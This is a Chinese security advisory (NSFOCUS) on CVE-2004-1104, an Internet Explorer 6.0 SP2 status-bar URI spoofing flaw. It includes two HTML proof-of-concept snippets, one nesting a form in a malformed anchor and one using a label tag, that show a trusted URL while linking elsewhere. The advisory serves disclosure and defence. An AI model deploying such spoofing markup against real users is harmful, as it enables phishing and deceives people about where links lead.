安全研究

安全漏洞
Microsoft Internet Explorer HTML表单标记URI混淆漏洞

发布日期:2004-10-30
更新日期:2009-07-12

受影响系统:
Microsoft Internet Explorer 6.0 SP2
描述:
BUGTRAQ  ID: 11565
CVE(CAN) ID: CVE-2004-1104

Windows Internet Explorer,简称MSIE,是微软公司推出的一款网页浏览器。

Microsoft Internet Explorer 6.0 SP2在处理特制的HTML锚URI标签及各种表单标签时出错,存在URI混淆漏洞,可使攻击者在受害者状态栏中显示虚假信息。攻击者通过恶意网页执行钓鱼攻击,这些网页中包含一个合法站点的BASE元素,之后是"href"空属性的锚"a"元素,还有指向恶意URL的FORM,及虚假INPUT提交元素。

<*来源:http-equiv@excite.comhttp-equiv@excite.com
  
  链接:http://xforce.iss.net/xforce/xfdb/17938
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

The following example is available. This example embeds an HTML form between malformed anchor, &#39;&amp;lt;a&amp;gt;&#39;, tags:

&amp;lt;base href=&quot;http://www.example1.com&quot;&amp;gt;

&amp;lt;a href=&amp;gt;&amp;lt;form action=&quot;http://www.example2.com&quot;
method=&quot;get&quot;&amp;gt;&amp;lt;INPUT style=&quot;BORDER-RIGHT: 0pt; BORDER-TOP: 0pt;
FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;TEXT-DECORATION: underline&quot; type=submit
value=http://www.example1.com&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;/a&amp;gt;

Another proof of concept exploit has been made available.  This method employs the &#39;id&#39; parameter embedded inside an anchor tag that is controlled by a &#39;label&#39;  tag, allowing the label tag to control what value is presented to an unsuspecting user:

&amp;lt;body style=&quot;color: WindowText; background-color: Window;&quot;&amp;gt;
&amp;lt;div&amp;gt;IE/OE Restricted Zone Status Bar Spoofing&amp;lt;/div&amp;gt;
&amp;lt;div&amp;gt;Tested on Windows XP with SP2 installed.&amp;lt;/div&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a id=&quot;SPOOF&quot; href=&quot;http://www.example.com/?maliciousContents&quot;&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div&amp;gt;
&amp;lt;a href=&quot;http://www.example.com/?trustedSite&quot;&amp;gt;
&amp;lt;table&amp;gt;
&amp;lt;caption&amp;gt;
&amp;lt;a href=&quot;http://www.example.com/?trustedSite &quot;&amp;gt;
&amp;lt;label for=&quot;SPOOF&quot;&amp;gt;
&amp;lt;u style=&quot;cursor: pointer; color: blue&quot;&amp;gt;
http://www.example.com/?trustedSite
&amp;lt;/u&amp;gt;
&amp;lt;/label&amp;gt;
&amp;lt;/a&amp;gt;
&amp;lt;/caption&amp;gt;
&amp;lt;/table&amp;gt;
&amp;lt;/a&amp;gt;
&amp;lt;/div&amp;gt;


The above proof of concept exploit can also be viewed at the following site:

http://habaneronetworks.com/viewArticle.php?ID=140

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:1854
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障